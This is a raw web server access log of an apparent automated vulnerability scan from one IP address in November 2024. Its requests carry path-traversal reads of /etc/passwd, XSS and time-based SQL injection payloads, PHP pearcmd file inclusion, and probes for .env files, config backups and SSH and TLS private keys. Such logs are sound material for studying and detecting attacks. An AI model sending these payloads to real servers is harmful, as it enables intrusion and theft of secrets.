195.164.49.69 - - [18/Nov/2024:22:13:15 +0000] GET /dev/tests/functional/credentials.xml.dist HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:13:17 +0000] GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:13:21 +0000] GET /artifactory/ui/repodata?deploy=true HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:13:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:13:25 +0000] GET /config.php.zip HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:13:26 +0000] GET /installer/installerUI.php HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /config.php.tar.gz HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /config.php.new HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /common/config.php.new HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /wp-config.php.bk HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /home/iopanWORDPRESS.txt HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:13:28 +0000] GET /home/iopan-WORDPRESS.txt HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:13:41 +0000] GET /v1/cs/configs?export=true&group&tenant&appName&ids&dataId HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:13:43 +0000] GET /_vti_pvt/service.pwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:13:45 +0000] GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:13:47 +0000] GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:13:49 +0000] GET /chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:13:51 +0000] GET /modules/simpleimportproduct/send.php?phpinfo=1 HTTP/1.1 404 1118
- - - [18/Nov/2024:22:13:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:13:55 +0000] GET /interview?i=/etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:13:57 +0000] GET /applications.pinpoint HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:13:59 +0000] GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:14:01 +0000] GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:14:03 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:14:05 +0000] GET /manage/wizard/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:14:07 +0000] GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:14:09 +0000] GET /?aam-media=wp-config.php HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:14:12 +0000] GET /openam/ui/PWResetUserValidation HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:14:14 +0000] GET /IND780/excalweb.dll?webpage=../../AutoCE.ini HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:14:16 +0000] GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:14:18 +0000] GET /auth.json HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:14:20 +0000] GET /backend/admin/users?username=anonymous HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:14:22 +0000] GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:14:24 +0000] GET /cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:14:26 +0000] GET /data/plugins_listing HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:14:28 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:14:30 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:14:32 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:14:34 +0000] GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:14:36 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/SVK3.css HTTP/1.1 404 1178
195.164.49.69 - - [18/Nov/2024:22:14:38 +0000] GET /sftp-config.json HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:14:40 +0000] GET /modules/updateproducts/send.php?phpinfo=1 HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:14:42 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:14:44 +0000] GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:14:46 +0000] GET /admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:14:48 +0000] GET /configuration.yml HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:14:50 +0000] GET /home/000~ROOT~000/etc/passwd HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:14:52 +0000] GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:14:54 +0000] GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:22:14:56 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:14:58 +0000] GET /var/resource_config.json HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:15:00 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:15:02 +0000] GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:15:04 +0000] GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:22:15:06 +0000] GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:15:08 +0000] GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1 404 1153
195.164.49.69 - - [18/Nov/2024:22:15:10 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:15:12 +0000] GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:15:14 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:15:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:15:18 +0000] GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:15:20 +0000] GET /solr/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:15:21 +0000] GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:15:24 +0000] GET /s/2p2cOYppqquy1H31m6wjIU5GwzY/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1 404 1209
195.164.49.69 - - [18/Nov/2024:22:15:26 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/N6BH.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:22:15:28 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:15:30 +0000] GET /SSI/Auth/ip_snmp.htm HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:15:32 +0000] GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1188
195.164.49.69 - - [18/Nov/2024:22:15:33 +0000] GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:15:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:15:37 +0000] GET /config/configuration.yml HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:15:39 +0000] GET /000~ROOT~000/etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:15:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:15:43 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:15:45 +0000] GET /admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:15:47 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:15:49 +0000] GET /_profiler/empty/search/results?limit=10 HTTP/1.1 404 1116
83.212.98.101 - - [18/Nov/2024:22:15:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:15:51 +0000] GET /ui/PWResetUserValidation HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:15:53 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:15:55 +0000] GET /installer HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:15:57 +0000] GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:15:59 +0000] GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:16:01 +0000] GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:16:03 +0000] GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:22:16:05 +0000] GET /admin_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:16:07 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:16:09 +0000] GET /.drone.yml HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:16:11 +0000] GET /.htpasswd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:16:13 +0000] GET /s/2p2cOYppqquy1H31m6wjIU5GwzY/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 404 1197
195.164.49.69 - - [18/Nov/2024:22:16:15 +0000] GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:16:17 +0000] GET /config/databases.yml HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:16:19 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:16:21 +0000] GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1201
195.164.49.69 - - [18/Nov/2024:22:16:23 +0000] GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:16:25 +0000] GET /owncloud/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:16:27 +0000] GET /redmine/config/configuration.yml HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:16:29 +0000] GET /OLDS/home/000~ROOT~000/etc/passwd HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:16:31 +0000] GET /jenkins/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:16:33 +0000] GET /wp-content/backups-dup-pro/tmp/ HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:16:35 +0000] GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:16:37 +0000] GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:16:39 +0000] GET /index_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:16:41 +0000] GET /app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd HTTP/1.1 404 1167
195.164.49.69 - - [18/Nov/2024:22:16:43 +0000] GET /index.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:16:45 +0000] GET /app_dev.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:16:47 +0000] GET /index_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:22:16:49 +0000] GET /dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:16:50 +0000] GET /debug.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:22:16:52 +0000] GET /_debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:16:54 +0000] GET /web/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:22:16:56 +0000] GET /public/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:16:58 +0000] GET /frontend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1137
195.164.49.69 - - [18/Nov/2024:22:17:00 +0000] GET /backend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:17:02 +0000] GET /api_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:17:04 +0000] GET /app.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:17:06 +0000] GET /app_test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:22:17:08 +0000] GET /test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:22:17:10 +0000] GET /symfony/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:17:12 +0000] GET /debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:17:14 +0000] GET /dev/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:22:17:16 +0000] GET /profiler/empty/search/results?limit=10 HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:17:27 +0000] POST /jolokia/read/getDiagnosticOptions HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:17:27 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:17:30 +0000] POST /XMLCHART HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:17:33 +0000] GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:17:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:17:37 +0000] POST /webtools/control/xmlrpc HTTP/1.1 404 1105
83.212.98.101 - - [18/Nov/2024:22:17:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:17:42 +0000] POST /content/2p2dkSGX2G8kFSXDB1qsUeBp9TQ HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:17:44 +0000] POST /v2/api/product/manger/getInfo HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:22:17:46 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:17:48 +0000] POST /_adminer/index.php HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:17:51 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:17:51 +0000] POST /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:17:51 +0000] POST /adminer/adminer.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:17:51 +0000] POST /adminer/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:17:51 +0000] POST /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:18:00 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:18:00 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:18:03 +0000] POST /wp-json/buddypress/v1/signup HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:18:05 +0000] POST /druid/indexer/v1/sampler HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:18:07 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:22:18:11 +0000] GET /status.htm HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:18:12 +0000] POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:18:12 +0000] GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:18:17 +0000] POST /admin/asign-single-student-subjects.php HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:18:19 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:18:22 +0000] POST /api/jmeter/download/files HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:18:32 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:18:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:18:35 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:18:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:18:39 +0000] POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:18:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:18:43 +0000] GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:18:45 +0000] POST /content/2p2dkSGX2G8kFSXDB1qsUeBp9TQ.af.internalsubmit.json HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:18:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:18:49 +0000] GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:18:51 +0000] GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:18:53 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:18:56 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:18:58 +0000] POST /rest/v1/login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:19:00 +0000] POST /rest/v1/login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:19:03 +0000] POST /controller/login.php?acao=autenticar HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:19:03 +0000] GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:19:03 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:19:06 +0000] POST /bonita/loginservice?redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:19:09 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:19:10 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:19:12 +0000] POST /login.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:19:14 +0000] POST /rest/auth/login HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:19:17 +0000] POST /teamserver/j_security_check HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:19:19 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:19:26 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:19:29 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:19:30 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:19:37 +0000] GET /?controller=AuthController&action=login HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:19:39 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:19:40 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:19:43 +0000] POST /login.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:19:45 +0000] GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+k3ctbwjo6u.log HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:19:47 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:19:49 +0000] GET /userRpm/MenuRpm.htm HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:19:51 +0000] GET /common/llhsi.txt HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:19:53 +0000] GET /userRpm/LoginRpm.htm?Save=Save HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:19:54 +0000] GET /authenticate HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:19:57 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:19:59 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:20:01 +0000] POST /zabbix/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:20:03 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:20:05 +0000] POST /ZMC_Admin_Login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:20:07 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:07 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:20:09 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:20:14 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:20:14 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:20:14 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:20:44 +0000] GET /config/jwt/private.pem HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:20:44 +0000] GET /localhost.key HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:20:44 +0000] GET /host.key HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:20:44 +0000] GET /www.key HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /private-key HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /privatekey.key HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /server.key HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /my.key HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /key.pem HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /ssl/localhost.key HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /ssl/sdc.iopan.pl:80.key HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /id_rsa HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:20:45 +0000] GET /id_dsa HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /id_rsa_1024 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /id_rsa_2048 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /id_rsa_3072 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /id_rsa_4096 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /.ssh/id_rsa HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /.ssh/id_dsa HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /.ssh/id_rsa_1024 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /.ssh/id_rsa_2048 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:20:46 +0000] GET /.ssh/id_rsa_3072 HTTP/1.1 404 1094
